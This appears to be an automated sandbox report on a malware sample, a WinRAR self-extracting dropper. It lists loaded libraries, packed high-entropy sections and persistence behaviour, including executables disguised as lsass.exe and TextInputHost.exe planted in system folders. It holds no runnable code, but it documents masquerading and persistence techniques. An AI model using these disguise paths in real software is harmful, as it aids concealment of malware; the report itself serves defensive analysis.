                                    Source: C:\Recovery\lsass.exeSection loaded: slc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: userenv.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sppc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: version.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ktmw32.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasapi32.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasman.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rtutils.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mswsock.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: winhttp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: iphlpapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dnsapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: winnsi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasadhlp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: propsys.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dlnashext.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wpdshext.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: edputil.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: urlmon.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: iertutil.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: srvcli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: netutils.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wintypes.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: appresolver.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: bcp47langs.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: slc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: userenv.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sppc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: version.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ktmw32.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasapi32.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasman.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rtutils.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mswsock.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: winhttp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: iphlpapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dnsapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: winnsi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasadhlp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: propsys.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dlnashext.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wpdshext.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: edputil.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: urlmon.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: iertutil.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: srvcli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: netutils.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wintypes.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: appresolver.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: bcp47langs.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: slc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: userenv.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sppc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: version.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ktmw32.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasapi32.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasman.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rtutils.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mswsock.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: winhttp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: iphlpapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: dnsapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: winnsi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rasadhlp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: propsys.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDirectory created: C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDirectory created: C:\Program Files\Windows Portable Devices\6e82e733a89f1eJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\6e82e733a89f1eJump to behavior
                                    Source: Qsi7IgkrWa.exeStatic file information: File size 2470804 > 1048576
                                    Source: Qsi7IgkrWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: Qsi7IgkrWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: Qsi7IgkrWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: Qsi7IgkrWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Qsi7IgkrWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: Qsi7IgkrWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: Qsi7IgkrWa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Qsi7IgkrWa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Qsi7IgkrWa.exe
                                    Source: Qsi7IgkrWa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: Qsi7IgkrWa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: Qsi7IgkrWa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: Qsi7IgkrWa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: Qsi7IgkrWa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeFile created: C:\HypercontainerServerhostDll\__tmp_rar_sfx_access_check_4629265Jump to behavior
                                    Source: Qsi7IgkrWa.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCF640 push ecx; ret 0_2_00BCF653
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCEB78 push eax; ret 0_2_00BCEB96
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BC07157 pushad ; iretd 4_2_00007FFD9BC0715D
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BC03A9E push ecx; iretd 4_2_00007FFD9BC03AA4
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BE9DED1 push ecx; iretd 4_2_00007FFD9BE9DED2
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BE9753F push ebx; iretd 4_2_00007FFD9BE9756A
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BE9B4F7 push FFFFFF8Eh; ret 4_2_00007FFD9BE9B504
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeCode function: 4_2_00007FFD9BE960B6 push esp; retf 4_2_00007FFD9BE960B9
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BBF7157 pushad ; iretd 10_2_00007FFD9BBF715D
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BBF3A9E push ecx; iretd 10_2_00007FFD9BBF3AA4
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BE860B6 push esp; retf 10_2_00007FFD9BE860B9
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BE87D9D pushfd ; ret 10_2_00007FFD9BE87D9F
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BE884FE push ebx; retf 10_2_00007FFD9BE88500
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BE8AC88 push eax; iretd 10_2_00007FFD9BE8ACA9
                                    Source: C:\Recovery\lsass.exeCode function: 10_2_00007FFD9BE8AC80 push eax; iretd 10_2_00007FFD9BE8ACA9
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BAD616F push cs; ret 17_2_00007FFD9BAD617F
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BAD8158 push ebx; ret 17_2_00007FFD9BAD816A
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BAD8150 push ebx; ret 17_2_00007FFD9BAD816A
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BAD8148 push ebx; ret 17_2_00007FFD9BAD816A
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BAB612B push eax; ret 17_2_00007FFD9BAB613D
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BAB289F push eax; retf 17_2_00007FFD9BAB293D
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BC07157 pushad ; iretd 17_2_00007FFD9BC0715D
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BC03A9E push ecx; iretd 17_2_00007FFD9BC03AA4
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BE960B6 push esp; retf 17_2_00007FFD9BE960B9
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BE97D9D pushfd ; ret 17_2_00007FFD9BE97D9F
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BE984FE push ebx; retf 17_2_00007FFD9BE98500
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BE9AC88 push eax; iretd 17_2_00007FFD9BE9ACA9
                                    Source: C:\Recovery\lsass.exeCode function: 17_2_00007FFD9BE9AC80 push eax; iretd 17_2_00007FFD9BE9ACA9
                                    Source: C:\Recovery\lsass.exeCode function: 22_2_00007FFD9BC17157 pushad ; iretd 22_2_00007FFD9BC1715D
                                    Source: C:\Recovery\lsass.exeCode function: 22_2_00007FFD9BC13A9E push ecx; iretd 22_2_00007FFD9BC13AA4
                                    Source: C:\Recovery\lsass.exeCode function: 22_2_00007FFD9BEA60AC push esp; retf 22_2_00007FFD9BEA60B9
                                    Source: ComponentBrowserruntimeHostNet.exe.0.drStatic PE information: section name: .text entropy: 7.541810901864749
                                    Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe.4.drStatic PE information: section name: .text entropy: 7.541810901864749
                                    Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe0.4.drStatic PE information: section name: .text entropy: 7.541810901864749
                                    Source: lsass.exe.4.drStatic PE information: section name: .text entropy: 7.541810901864749
                                    Source: TextInputHost.exe.4.drStatic PE information: section name: .text entropy: 7.541810901864749
                                    Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe1.4.drStatic PE information: section name: .text entropy: 7.541810901864749

                                    Persistence and Installation Behavior

                                    barindex
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Recovery\lsass.exeJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\whSGRYvh.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\CmKYhHkf.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\HInMzsNO.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\oZQzjlbX.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\CYkgyfvY.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\XVlEhDHN.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\EaXPTOzT.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\LkfFbrxk.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\dhGiqFYl.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\brdjWOxr.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\JeCeCscc.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\qjmAjDHY.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\RIKTmlsJ.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\nDKQhfgz.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\GQmWAABO.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\icHKrlAV.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Users\user\Desktop\iAcIGVjp.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\MtSmEjDp.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\kwMHLMmE.logJump to dropped file
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeFile created: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\HypercontainerServerhostDll\TextInputHost.exeJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\QrHcjUSw.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\CKyWUHyH.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\gVSkXNZP.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\nPayaidT.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\gvHJzrMq.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\reDyPeef.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\ryfhxvpx.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\heJamQmd.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\vXhOtgDl.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\AsWoiMty.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\gtMhCYIK.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Users\user\Desktop\AFUvvHdz.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\XmyUnkUi.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\uhqhlNja.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\MhHNxrMf.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Users\user\Desktop\PgRkIPoV.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Recovery\lsass.exeJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\phNJAZcc.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\YBBlCWWw.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\UynSGdTD.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Users\user\Desktop\ZPkAsstD.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\tIBixNUy.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\UKBLugCN.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exeJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\FrxXNAmm.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\TBLKldEI.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\QXsvSdGP.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Users\user\Desktop\iAcIGVjp.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Users\user\Desktop\AFUvvHdz.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Users\user\Desktop\ZPkAsstD.logJump to dropped file
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile created: C:\Users\user\Desktop\PgRkIPoV.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\vXhOtgDl.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\gtMhCYIK.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\QrHcjUSw.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\HInMzsNO.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\TBLKldEI.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\nPayaidT.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\dhGiqFYl.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\UynSGdTD.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\kwMHLMmE.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\GQmWAABO.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\whSGRYvh.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\nDKQhfgz.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\AsWoiMty.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\brdjWOxr.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\RIKTmlsJ.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\JeCeCscc.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\reDyPeef.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\MtSmEjDp.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\CKyWUHyH.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\uhqhlNja.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\FrxXNAmm.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\heJamQmd.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\YBBlCWWw.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\QXsvSdGP.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\CYkgyfvY.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\gVSkXNZP.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\XmyUnkUi.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\EaXPTOzT.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\UKBLugCN.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\qjmAjDHY.logJump to dropped file
                                    Source: C:\Recovery\lsass.exeFile created: C:\Users\user\Desktop\oZQzjlbX.logJump to dropped file
